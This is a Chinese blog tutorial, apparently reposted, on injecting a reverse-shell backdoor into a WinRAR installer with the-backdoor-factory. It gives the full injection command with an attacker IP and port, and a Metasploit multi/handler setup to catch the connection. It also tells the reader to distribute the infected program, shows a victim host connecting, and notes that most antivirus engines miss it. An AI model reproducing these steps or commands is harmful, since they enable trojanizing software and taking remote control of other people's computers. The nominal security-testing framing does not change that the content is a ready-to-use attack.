后门

我们的网络不安全
https://www.youtube.com/watch?v=nJF9OTscFiQ

这次我们用到的程序叫backdoor-factory,为完整的程序注入后门程序。具体的请网上查看。

在kali linux系统上集成了该程序,但是注入后的程序显示为空文件(大小为0).故在ubuntu上手动安装尝试了一下,看我们的网络是否够安全。

注入

1.下载程序

git clone https://github.com/secretsquirrel/the-backdoor-factory.git

2.安装

sudo chmod +x ./install.sh

3.运行

sudo ./backdoor.py

iLOchco.jpg

4.选择目标文件

本次使用的软件为 https://rarlab.com/rar/winrar-x64-561.exe
之后将在此程序中注入后门

执行 ./babackdoor.py -f winrar-x64-561.exe -S
可以看到此程序支持代码注入
EsmxM2R.jpg
执行 ./babackdoor.py -f winrar-x64-561.exe -s show 查看支持哪几种注入方式
qotOrEs.jpg

5.开始注入

执行 ./backdoor.py -f ./winrar-x64-561.exe -s reverse_shell_tcp_inline -H 172.17.170.38 -P 1234

reverse_shell_tcp_inline 注入方式
172.17.170.38 攻击者ip,之后受害者主机来访问该ip
1234 攻击者端口,之后受害者主机来访问该端口

选择注入的位置:

qNuKCOi.jpg
都可以,这里我们选择2
oVJHdB8.jpg
完成。可以在指定目录下找到该文件。
到这里就注入完成了。

控制

服务器等待中招的pc连接。
设置服务器。打开kali linux系统。

#msfconsole
msf> use multi/handler
msf exploit(handler)> set PAYLOAD windows/shell/reverse_tcp
msf exploit(handler) > set LPORT 1234
msf exploit(handler) > set LHOST 172.17.170.38
msf exploit(handler) > exploit

将注入好的程序散发出去。如果有计算机不幸中招。
当有中招的pc代开注入后门的程序后,服务器端会有响应。
2UpwlH4.jpg
可以看到172.17.172.223连入服务器。这时候,你就可以全权控制223这台主机了。

可以看到被控制的主机信息。(编码格式可能不对,出现乱码)

9V7BGXl.jpg

测试

对于注入后门程序的程序,会不会成功被检测到呢。我用的火绒杀毒,双击之后立马报警。
s3WixcE.png
对于其他杀毒软件看看什么情况,可以看到能够查杀到此后门的杀毒软件并不多。
Iczy45H.png
YwqX8Sw.png

实际上,该程序官网下载的源文件也可能会被误杀

xRKX4JZ.png
杀毒可以参考网站:
http://www.virscan.org/language/zh-cn/
https://www.virustotal.com/zh-cn/

参考

利用BDF向EXE文件植入后门

Backdoor factory – How to inject shell-code into windows application

Kali Linux 渗透测试 博客记录

转载于:https://www.cnblogs.com/maskerk/p/10208111.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值